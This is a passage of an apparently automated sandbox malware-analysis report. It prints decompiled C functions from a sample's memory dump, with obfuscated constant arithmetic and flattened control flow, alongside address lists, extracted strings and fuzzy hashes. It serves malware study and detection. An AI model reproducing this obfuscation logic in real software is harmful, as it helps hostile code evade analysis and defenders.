				_t202 =  &_v80;
				_v16 = 0x72fa2;
				asm("stosd");
				_t178 = __ecx;
				_t180 = 0xa;
				asm("stosd");
				_t200 = 0x2b4db5ec;
				asm("stosd");
				_v40 = 0x891b;
				_t199 = 0;
				_v40 = _v40 / _t180;
				_t181 = 0x6c;
				_v40 = _v40 * 0x68;
				_v40 = _v40 ^ 0x0005e3a3;
				_v44 = 0x9655;
				_v44 = _v44 * 0xf;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x19df57eb;
				_v72 = 0xbd5a;
				_v72 = _v72 + 0xffff8364;
				_v72 = _v72 << 0x10;
				_v72 = _v72 ^ 0x40be2127;
				_v80 = 0xa978;
				_v80 = _v80 >> 2;
				_v80 = _v80 * 0x4d;
				_v80 = _v80 + 0xffffa5df;
				_v80 = _v80 ^ 0x000c0c91;
				_v48 = 0xafca;
				_v48 = _v48 / _t181;
				_t182 = 0x1b;
				_v48 = _v48 / _t182;
				_v48 = _v48 ^ 0x00007bb0;
				_v76 = 0xd3be;
				_v76 = _v76 + 0xaf94;
				_v76 = _v76 * 0x7a;
				_v76 = _v76 + 0xffff3809;
				_v76 = _v76 ^ 0x00b7df19;
				_v32 = 0x247d;
				_v32 = _v32 ^ 0xa5bfd644;
				_v32 = _v32 ^ 0xa5bfe9a1;
				_v60 = 0x2253;
				_v60 = _v60 << 0xe;
				_v60 = _v60 + 0x5dbf;
				_v60 = _v60 ^ 0x089505e9;
				_v64 = 0x9677;
				_v64 = _v64 + 0xffff4df0;
				_v64 = _v64 * 0x66;
				_v64 = _v64 ^ 0xfff55b5e;
				_v68 = 0xa3c;
				_v68 = _v68 * 0xf;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 ^ 0x00004caf;
				_v52 = 0xdccc;
				_v52 = _v52 << 0xa;
				_v52 = _v52 * 3;
				_v52 = _v52 ^ 0x0a59f928;
				_v56 = 0x15b5;
				_t183 = 0x30;
				_v56 = _v56 / _t183;
				_v56 = _v56 ^ 0xfaaf40a2;
				_v56 = _v56 ^ 0xfaaf569d;
				_v36 = 0x3648;
				_v36 = _v36 << 2;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x00002d3b;
				_v28 = 0x3990;
				_v28 = _v28 | 0x7bef7c0b;
				_v28 = _v28 ^ 0x7bef5b9b;
				_v20 = 0xfcb4;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00002222;
				_v24 = 0xa0;
				_v24 = _v24 >> 9;
				_v24 = _v24 ^ 0x00005568;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t200 - 0x2b4db5ec;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t200 = 0x2f3cb019;
							continue;
						} else {
							if(_t200 == 0x3c46948) {
								_push(_t184);
								_t168 = E002962BA();
								_t202 =  &(_t202[1]);
								_t200 = 0x1382179b;
								_t199 = _t199 + _t168;
								continue;
							} else {
								if(_t200 == 0xe2325b7) {
									_push(_v20);
									_t199 = _t199 + E002962BA();
								} else {
									if(_t200 == 0x1382179b) {
										_push(_t184);
										_t173 = E002962BA();
										_t202 =  &(_t202[1]);
										_t200 = 0x3a1fb840;
										_t199 = _t199 + _t173;
										continue;
									} else {
										if(_t200 != 0x25aa6a95) {
											goto L19;
										} else {
											_push(_t184);
											_t176 = E002962BA();
											_t202 =  &(_t202[1]);
											_t200 = 0x2f4090ca;
											_t199 = _t199 + _t176;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t199;
					}
					if(_t200 == 0x2f172a96) {
						_t184 = _t178 + 0x20;
						_t161 = E002AA774(_t184, _v36, _v28);
						_t202 =  &(_t202[1]);
						_t200 = 0xe2325b7;
						_t199 = _t199 + _t161;
						goto L19;
					} else {
						if(_t200 == 0x2f3cb019) {
							_t184 = _t178;
							_t162 = E002AA774(_t184, _v40, _v44);
							_t202 =  &(_t202[1]);
							_t200 = 0x25aa6a95;
							_t199 = _t199 + _t162;
							goto L1;
						} else {
							if(_t200 == 0x2f4090ca) {
								_push(_t184);
								_t165 = E002962BA();
								_t202 =  &(_t202[1]);
								_t200 = 0x3c46948;
								_t199 = _t199 + _t165;
								goto L1;
							} else {
								if(_t200 != 0x3a1fb840) {
									goto L19;
								} else {
									_t184 = _t178 + 0x18;
									_t177 = E002AA774(_t184, _v52, _v56);
									_t202 =  &(_t202[1]);
									_t200 = 0x2f172a96;
									_t199 = _t199 + _t177;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t200 != 0x329902d4);
				goto L22;
			}

0x00295d0e
0x00295d11
0x00295d25
0x00295d26
0x00295d2a
0x00295d2d
0x00295d33
0x00295d35
0x00295d36
0x00295d3e
0x00295d48
0x00295d51
0x00295d54
0x00295d58
0x00295d60
0x00295d6d
0x00295d71
0x00295d76
0x00295d7e
0x00295d86
0x00295d8e
0x00295d93
0x00295d9b
0x00295da3
0x00295dad
0x00295db1
0x00295db9
0x00295dc1
0x00295dd1
0x00295dd9
0x00295ddc
0x00295de0
0x00295de8
0x00295df0
0x00295dfd
0x00295e01
0x00295e09
0x00295e11
0x00295e19
0x00295e21
0x00295e29
0x00295e31
0x00295e36
0x00295e3e
0x00295e46
0x00295e4e
0x00295e5b
0x00295e5f
0x00295e67
0x00295e74
0x00295e78
0x00295e7d
0x00295e85
0x00295e8d
0x00295e97
0x00295e9b
0x00295ea3
0x00295eb3
0x00295eb6
0x00295eba
0x00295ec2
0x00295eca
0x00295ed2
0x00295ed7
0x00295edc
0x00295ee4
0x00295eec
0x00295ef4
0x00295efc
0x00295f04
0x00295f09
0x00295f11
0x00295f19
0x00295f1e
0x00295f1e
0x00295f26
0x00295f26
0x00295f26
0x00295f26
0x00295f28
0x00000000
0x00000000
0x00295f2e
0x00295fa6
0x00000000
0x00295f30
0x00295f36
0x00295f94
0x00295f95
0x00295f9a
0x00295f9d
0x00295fa2
0x00000000
0x00295f38
0x00295f3e
0x0029605a
0x00296063
0x00295f44
0x00295f4a
0x00295f7a
0x00295f7b
0x00295f80
0x00295f83
0x00295f88
0x00000000
0x00295f4c
0x00295f52
0x00000000
0x00295f58
0x00295f60
0x00295f61
0x00295f66
0x00295f69
0x00295f6e
0x00000000
0x00295f6e
0x00295f52
0x00295f4a
0x00295f3e
0x00295f36
0x00296065
0x0029606e
0x0029606e
0x00295fb6
0x00296032
0x00296035
0x0029603a
0x0029603d
0x00296042
0x00000000
0x00295fb8
0x00295fbe
0x00296014
0x00296016
0x0029601b
0x0029601e
0x00296023
0x00000000
0x00295fc0
0x00295fc6
0x00295ff7
0x00295ff8
0x00295ffd
0x00296000
0x00296005
0x00000000
0x00295fc8
0x00295fce
0x00000000
0x00295fd0
0x00295fd8
0x00295fdb
0x00295fe0
0x00295fe3
0x00295fe8
0x00000000
0x00295fe8
0x00295fce
0x00295fc6
0x00295fbe
0x00000000
0x00296044
0x00296044
0x00000000

Strings

"", xrefs: 00295F09
hU, xrefs: 00295F1E
;-, xrefs: 00295EDC
}$, xrefs: 00295E11
S", xrefs: 00295E29
<, xrefs: 00295E67

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ""$;-$<$S"$hU$}$
API String ID: 0-2472750449
Opcode ID: a129b7fb8718606597956e79b880fa5646b9aaf60079f7aaee0b67f2be1e9da2
Instruction ID: 0caaf649c2729008e505f896c1c67bc928c16a7ed7f8e2c5dcf94b304804ab73
Opcode Fuzzy Hash: a129b7fb8718606597956e79b880fa5646b9aaf60079f7aaee0b67f2be1e9da2
Instruction Fuzzy Hash: 9B8185B29193029FD758CF25D48A40BBBF1ABC5318F054A1DF49697260E7B9CA19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002981A0, Relevance: 7.6, Strings: 6, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E002981A0(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _t143;
				signed int _t149;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr _t171;
				void* _t176;
				void* _t177;

				_t151 = __ecx;
				_t169 =  *0x2b0718; // 0x0
				while(_t169 != 0) {
					if( *((intOrPtr*)(_t169 + 0x2c)) != 0) {
						 *((intOrPtr*)(_t169 + 0x18))( *((intOrPtr*)(_t169 + 0x2c)), 0xb, 0);
					}
					_t169 =  *((intOrPtr*)(_t169 + 8));
				}
				_t152 = _t151 | 0xffffffff;
				_pop(_t170);
				_t177 = _t176 - 0x40;
				_v8 = 0x579660;
				_t149 = _t152;
				_v4 = 0;
				_v32 = 0x7f0a;
				_v32 = _v32 | 0x793e3d56;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x3c9f3f0b;
				_v36 = 0x1a5f;
				_v36 = _v36 + 0xffff6044;
				_v36 = _v36 | 0x092639e6;
				_v36 = _v36 ^ 0xffff6a93;
				_v40 = 0x95b8;
				_v40 = _v40 | 0xfd2e4967;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0xf4bb02ee;
				_v24 = 0x4086;
				_v24 = _v24 + 0x3345;
				_v24 = _v24 >> 9;
				_v24 = _v24 ^ 0x00005a1a;
				_v56 = 0x44d;
				_v56 = _v56 + 0xffffb36e;
				_v56 = _v56 ^ 0x60c6cbbe;
				_v56 = _v56 >> 0x10;
				_v56 = _v56 ^ 0x0000bdbf;
				_v60 = 0xd3f6;
				_v60 = _v60 << 5;
				_v60 = _v60 ^ 0xfc6fca2a;
				_v60 = _v60 | 0x2e6107a2;
				_v60 = _v60 ^ 0xfe75905f;
				_v28 = 0x6470;
				_v28 = _v28 + 0xffffc1f7;
				_v28 = _v28 << 7;
				_v28 = _v28 ^ 0x0013310e;
				_v48 = 0x7409;
				_v48 = _v48 + 0xffff4b7b;
				_v48 = _v48 << 0xc;
				_v48 = _v48 | 0x981dd878;
				_v48 = _v48 ^ 0xfbfd8bf9;
				_v20 = 0xa0e9;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x5c378e95;
				_v20 = _v20 ^ 0x5c37a2fa;
				_v52 = 0x7f3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0xae5e1891;
				_v52 = _v52 ^ 0xb63863b5;
				_v52 = _v52 ^ 0x1861d611;
				_v16 = 0x3d46;
				_v16 = _v16 ^ 0x87280f4f;
				_v16 = _v16 ^ 0x87281a0f;
				_v12 = 0xdfd9;
				_t153 = 0x6a;
				_v12 = _v12 * 0x19;
				_t166 = 0x2b0718;
				_v12 = _v12 ^ 0x0015c1ec;
				_v44 = 0x5d3;
				_v44 = _v44 << 0x10;
				_v44 = _v44 / _t153;
				_v44 = _v44 + 0xffff869c;
				_v44 = _v44 ^ 0x000d9538;
				_v64 = 0xeccd;
				_v64 = _v64 + 0xffff8c78;
				_v64 = _v64 | 0xa77a13b4;
				_v64 = _v64 + 0x75e;
				_v64 = _v64 ^ 0xa77a8353;
				_t171 =  *0x2b0718; // 0x0
				while(_t171 != 0) {
					if( *((intOrPtr*)(_t171 + 0x2c)) == 0) {
						L10:
						 *_t166 =  *((intOrPtr*)(_t171 + 8));
						_t143 = E0029EF80(_v12, _t171, _v44);
					} else {
						_t143 = E00293AD2(_v32,  *((intOrPtr*)(_t171 + 0x14)), _t149, _v36, _v40);
						_t177 = _t177 + 0xc;
						if(_t143 != _v64) {
							_t138 = _t171 + 8; // 0x8
							_t166 = _t138;
						} else {
							 *((intOrPtr*)(_t171 + 0x18))( *((intOrPtr*)(_t171 + 0x2c)), 0, 0);
							E0029753A(_v36, _v68,  *((intOrPtr*)(_t171 + 0x2c)), _v72, _v40);
							E002A0DE5(_v60, _v64,  *((intOrPtr*)(_t171 + 0x14)), _v28);
							_t177 = _t177 + 0x18;
							goto L10;
						}
					}
					_t171 =  *_t166;
				}
				return _t143;
			}

0x002981a0
0x002981a1
0x002981bc
0x002981ad
0x002981b6
0x002981b6
0x002981b9
0x002981b9
0x002981c0
0x002981c3
0x002a2149
0x002a214c
0x002a215a
0x002a215c
0x002a2160
0x002a2168
0x002a2170
0x002a2174
0x002a217c
0x002a2184
0x002a218c
0x002a2194
0x002a219c
0x002a21a4
0x002a21ac
0x002a21b1
0x002a21b9
0x002a21c1
0x002a21c9
0x002a21ce
0x002a21d6
0x002a21de
0x002a21e6
0x002a21ee
0x002a21f3
0x002a21fb
0x002a2203
0x002a2208
0x002a2210
0x002a2218
0x002a2220
0x002a2228
0x002a2230
0x002a2235
0x002a223d
0x002a2245
0x002a224d
0x002a2252
0x002a225a
0x002a2262
0x002a226a
0x002a226f
0x002a2277
0x002a227f
0x002a2287
0x002a228c
0x002a2294
0x002a229c
0x002a22a4
0x002a22ac
0x002a22b4
0x002a22bc
0x002a22cd
0x002a22ce
0x002a22d2
0x002a22d7
0x002a22df
0x002a22e7
0x002a22f2
0x002a22f6
0x002a22fe
0x002a2306
0x002a230e
0x002a2316
0x002a231e
0x002a2326
0x002a232e
0x002a23ab
0x002a2339
0x002a2394
0x002a23a1
0x002a23a3
0x002a233b
0x002a234b
0x002a2350
0x002a2357
0x002a23b7
0x002a23b7
0x002a2359
0x002a235e
0x002a2374
0x002a238c
0x002a2391
0x00000000
0x002a2391
0x002a2357
0x002a23a9
0x002a23a9
0x002a23b6

Strings

F=, xrefs: 002A22A4
E3, xrefs: 002A21C1
V=>y, xrefs: 002A2168
pd, xrefs: 002A2220
9&, xrefs: 002A218C
t, xrefs: 002A223D

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: t$E3$F=$V=>y$pd$9&
API String ID: 0-817990734
Opcode ID: 2a44de2d6ce2a24822351071ba3d9fb861b5f3304f6b1e994c8feacb0427198c
Instruction ID: c32e8c137324ac4708ea10b16bb917f9acb9015f9306f7bd18355eb98e7e986b
Opcode Fuzzy Hash: 2a44de2d6ce2a24822351071ba3d9fb861b5f3304f6b1e994c8feacb0427198c
Instruction Fuzzy Hash: E9614072418301EBD7A5CF25C98940BBBF1FB89718F104E4CF59A62260C3B99A49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 002A0EA0, Relevance: 7.6, Strings: 6, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002A0EA0(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v328;
				char _t135;
				void* _t136;
				signed int _t138;
				void* _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				char* _t146;
				intOrPtr* _t165;

				_v60 = _v60 & 0x00000000;
				_v68 = 0x4f7bfe;
				_v64 = 0x68c972;
				_v36 = 0xecbc;
				_t165 = __ecx;
				_v36 = _v36 * 0x64;
				_v36 = _v36 + 0xccd8;
				_v36 = _v36 ^ 0x005d76ad;
				_v24 = 0xfb8;
				_v24 = _v24 + 0x642c;
				_v24 = _v24 | 0x53420eab;
				_v24 = _v24 ^ 0x83c2798b;
				_v24 = _v24 ^ 0xd0800736;
				_v52 = 0xc274;
				_v52 = _v52 | 0xd9b29d93;
				_v52 = _v52 ^ 0xd9b28065;
				_v40 = 0x51ef;
				_v40 = _v40 ^ 0xc43a7eac;
				_v40 = _v40 ^ 0xc43a0e7c;
				_v16 = 0xc3c;
				_v16 = _v16 + 0x7284;
				_v16 = _v16 << 1;
				_v16 = _v16 + 0xdd6d;
				_v16 = _v16 ^ 0x00019146;
				_v56 = 0x6ea9;
				_v56 = _v56 ^ 0xed472f9a;
				_v56 = _v56 ^ 0xed4700e9;
				_v8 = 0x6190;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x519c4c94;
				_t143 = 0x3c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0xe8ca6c19;
				_v32 = 0xfb59;
				_v32 = _v32 + 0xffffe572;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 ^ 0x00002906;
				_v48 = 0x5638;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x0000562e;
				_v44 = 0x8cea;
				_v44 = _v44 + 0x5b7e;
				_v44 = _v44 ^ 0x0000fa96;
				_v28 = 0x3d4d;
				_v28 = _v28 + 0xffffe27b;
				_v28 = _v28 + 0xffffcdf5;
				_t144 = 0x77;
				_v28 = _v28 / _t144;
				_v28 = _v28 ^ 0x0226f0ea;
				_v20 = 0xacd3;
				_v20 = _v20 + 0xffffb49a;
				_v20 = _v20 << 5;
				_t145 = 0x3a;
				_t146 =  &_v328;
				_v20 = _v20 / _t145;
				_v20 = _v20 ^ 0x00004843;
				_v12 = 0xc903;
				_v12 = _v12 | 0xefa122df;
				_v12 = _v12 ^ 0xd1041e30;
				_v12 = _v12 + 0xffff1c6e;
				_v12 = _v12 ^ 0x3ea57454;
				while(1) {
					_t135 =  *_t165;
					if(_t135 == 0) {
						break;
					}
					if(_t135 == 0x2e) {
						 *_t146 = 0;
					} else {
						 *_t146 = _t135;
						_t146 = _t146 + 1;
						_t165 = _t165 + 1;
						continue;
					}
					L6:
					_t136 = E00298344(_v36,  &_v328, _v24, _v52);
					_t166 = _t136;
					if(_t136 != 0) {
						L8:
						_t138 = E0029964B(_v8, _v32, _t165 + 1, _v48, _v44);
						_push(_v12);
						_push(_v20);
						_push(_t138 ^ 0x5e3043f1);
						return E00293E66(_t166, _v28);
					}
					_t141 = E0029E859( &_v328, _v40, _v16, _v56);
					_t166 = _t141;
					if(_t141 != 0) {
						goto L8;
					}
					return _t141;
				}
				goto L6;
			}

0x002a0ea9
0x002a0eaf
0x002a0eb6
0x002a0ebd
0x002a0ecc
0x002a0ece
0x002a0ed1
0x002a0ed8
0x002a0edf
0x002a0ee6
0x002a0eed
0x002a0ef4
0x002a0efb
0x002a0f02
0x002a0f09
0x002a0f10
0x002a0f17
0x002a0f1e
0x002a0f25
0x002a0f2c
0x002a0f33
0x002a0f3a
0x002a0f3d
0x002a0f44
0x002a0f4b
0x002a0f52
0x002a0f59
0x002a0f60
0x002a0f67
0x002a0f6b
0x002a0f76
0x002a0f79
0x002a0f7c
0x002a0f83
0x002a0f8a
0x002a0f91
0x002a0f95
0x002a0f9c
0x002a0faa
0x002a0fad
0x002a0fb4
0x002a0fbb
0x002a0fc2
0x002a0fc9
0x002a0fd0
0x002a0fd7
0x002a0fe1
0x002a0fe6
0x002a0feb
0x002a0ff2
0x002a0ff9
0x002a1000
0x002a1007
0x002a100a
0x002a1010
0x002a1013
0x002a101a
0x002a1021
0x002a1028
0x002a102f
0x002a1036
0x002a1047
0x002a1047
0x002a104b
0x00000000
0x00000000
0x002a1041
0x002a104f
0x002a1043
0x002a1043
0x002a1045
0x002a1046
0x00000000
0x002a1046
0x002a1052
0x002a1061
0x002a1066
0x002a106c
0x002a108a
0x002a109a
0x002a109f
0x002a10a9
0x002a10af
0x00000000
0x002a10b5
0x002a107d
0x002a1082
0x002a1088
0x00000000
0x00000000
0x002a10bd
0x002a10bd
0x00000000

Strings

M=, xrefs: 002A0FC9
~[, xrefs: 002A0FBB
Q, xrefs: 002A0F17
.V, xrefs: 002A0FAD
CH, xrefs: 002A1013
,d, xrefs: 002A0EE6

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,d$.V$CH$M=$~[$Q
API String ID: 0-3367398399
Opcode ID: 8623c4d063eda386c0079fe1176b1587d0847f08bf1179e11586d3ea329d2f2b
Instruction ID: 619d5b6e18bb216ed06b1021d3e06b97dc19f1a5f3f999a20e43e8d2d7954a1b
Opcode Fuzzy Hash: 8623c4d063eda386c0079fe1176b1587d0847f08bf1179e11586d3ea329d2f2b
Instruction Fuzzy Hash: 94514271C0121AEBEF14CFE4D98A5EEBBB2FB45314F208189D411762A0D7B90A56CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10007528, Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10007528(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1001b6b4; // 0xdfb20980
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1001cc68 = _t6;
				 *0x1001cc64 = _t22;
				 *0x1001cc60 = _t25;
				 *0x1001cc5c = _t21;
				 *0x1001cc58 = _t27;
				 *0x1001cc54 = _t26;
				 *0x1001cc80 = ss;
				 *0x1001cc74 = cs;
				 *0x1001cc50 = ds;
				 *0x1001cc4c = es;
				 *0x1001cc48 = fs;
				 *0x1001cc44 = gs;
				asm("pushfd");
				_pop( *0x1001cc78);
				 *0x1001cc6c =  *_t31;
				 *0x1001cc70 = _v0;
				 *0x1001cc7c =  &_a4;
				 *0x1001cbb8 = 0x10001;
				_t11 =  *0x1001cc70; // 0x0
				 *0x1001cb6c = _t11;
				 *0x1001cb60 = 0xc0000409;
				 *0x1001cb64 = 1;
				_t12 =  *0x1001b6b4; // 0xdfb20980
				_v812 = _t12;
				_t13 =  *0x1001b6b8; // 0x204df67f
				_v808 = _t13;
				 *0x1001cbb0 = IsDebuggerPresent();
				_push(1);
				E1000CB48(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x100177f4);
				if( *0x1001cbb0 == 0) {
					_push(1);
					E1000CB48(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x10007528
0x10007528
0x10007528
0x10007528
0x10007528
0x10007528
0x10007528
0x1000752e
0x10007530
0x10007530
0x1000cc77
0x1000cc7c
0x1000cc82
0x1000cc88
0x1000cc8e
0x1000cc94
0x1000cc9a
0x1000cca1
0x1000cca8
0x1000ccaf
0x1000ccb6
0x1000ccbd
0x1000ccc4
0x1000ccc5
0x1000ccce
0x1000ccd6
0x1000ccde
0x1000cce9
0x1000ccf3
0x1000ccf8
0x1000ccfd
0x1000cd07
0x1000cd11
0x1000cd16
0x1000cd1c
0x1000cd21
0x1000cd2d
0x1000cd32
0x1000cd34
0x1000cd3c
0x1000cd47
0x1000cd54
0x1000cd56
0x1000cd58
0x1000cd5d
0x1000cd71

APIs

IsDebuggerPresent.KERNEL32 ref: 1000CD27
SetUnhandledExceptionFilter.KERNEL32 ref: 1000CD3C
UnhandledExceptionFilter.KERNEL32(100177F4), ref: 1000CD47
GetCurrentProcess.KERNEL32(C0000409), ref: 1000CD63
TerminateProcess.KERNEL32(00000000), ref: 1000CD6A

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 4f54d52b12e475db97f8f3bba1744d9f9f9838b84e9aa1f97d66dbb50c3bf101
Instruction ID: c73519b0d89758f3cc5bcad1b23f3baa871b36685b81d0581ad115bbf8b6ee40
Opcode Fuzzy Hash: 4f54d52b12e475db97f8f3bba1744d9f9f9838b84e9aa1f97d66dbb50c3bf101
Instruction Fuzzy Hash: 6D2198B89143689FF305DF28DEC5A457BA4FB08740F10C15AE50986260EBB4E981CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00296342, Relevance: 6.5, Strings: 5, Instructions: 247
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00296342(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* __edi;
				void* __ebp;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr _t283;
				void* _t284;
				intOrPtr _t287;
				signed int* _t288;

				_t288 =  &_v96;
				_v12 = 0x474011;
				_v8 = 0x414c1d;
				_t244 = __edx;
				_t283 = 0;
				_v4 = 0;
				_v28 = 0x67d2;
				_t287 = __ecx;
				_t284 = 0x2b544fa7;
				_t246 = 0x79;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x000066fd;
				_v92 = 0xc867;
				_t247 = 3;
				_v92 = _v92 / _t247;
				_v92 = _v92 | 0x11a3be64;
				_v92 = _v92 + 0x212b;
				_v92 = _v92 ^ 0x11a44bde;
				_v32 = 0xc098;
				_v32 = _v32 >> 0x10;
				_v32 = _v32 ^ 0x00001389;
				_v68 = 0xf3de;
				_v68 = _v68 | 0x7c489c07;
				_t248 = 0x11;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x93f1b12c;
				_v44 = 0x27a0;
				_v44 = _v44 << 0xa;
				_v44 = _v44 / _t248;
				_v44 = _v44 ^ 0x00090b27;
				_v76 = 0xa912;
				_v76 = _v76 >> 9;
				_v76 = _v76 ^ 0xb8cc95f3;
				_t249 = 0x45;
				_v76 = _v76 / _t249;
				_v76 = _v76 ^ 0x02adddff;
				_v48 = 0x179e;
				_v48 = _v48 + 0x8c02;
				_t250 = 0x4b;
				_v48 = _v48 * 0x71;
				_v48 = _v48 ^ 0x00486bb8;
				_v72 = 0xb5da;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xffffcbc6;
				_v72 = _v72 ^ 0xffff8f6a;
				_v36 = 0xf7ec;
				_v36 = _v36 + 0x2021;
				_v36 = _v36 ^ 0x000156ac;
				_v96 = 0x1050;
				_v96 = _v96 >> 3;
				_v96 = _v96 | 0xa8cf3f1a;
				_v96 = _v96 * 0x5f;
				_v96 = _v96 ^ 0xa4e81556;
				_v60 = 0x5f44;
				_v60 = _v60 ^ 0x70deb30f;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0x018118ef;
				_v88 = 0x8004;
				_t251 = 0x4d;
				_v88 = _v88 / _t251;
				_v88 = _v88 | 0x3fdf4b97;
				_v88 = _v88 ^ 0x3fdf3149;
				_v64 = 0x8766;
				_v64 = _v64 >> 7;
				_v64 = _v64 + 0xffffe4f8;
				_v64 = _v64 ^ 0xffffb143;
				_v20 = 0xf95a;
				_t252 = 0x56;
				_v20 = _v20 / _t252;
				_v20 = _v20 ^ 0x00004e62;
				_v24 = 0x629a;
				_t253 = 0x2f;
				_v24 = _v24 * 0x35;
				_v24 = _v24 ^ 0x00143780;
				_v80 = 0x9c1d;
				_v80 = _v80 * 0x6b;
				_v80 = _v80 + 0xf0e1;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0x108c5402;
				_v52 = 0x5302;
				_v52 = _v52 << 4;
				_v52 = _v52 + 0xfffff784;
				_v52 = _v52 ^ 0x00050462;
				_v56 = 0x7042;
				_v56 = _v56 ^ 0xabf60a6d;
				_v56 = _v56 / _t253;
				_v56 = _v56 ^ 0x03a8dd05;
				_v84 = 0xb263;
				_v84 = _v84 * 0x75;
				_v84 = _v84 << 2;
				_v84 = _v84 + 0xae13;
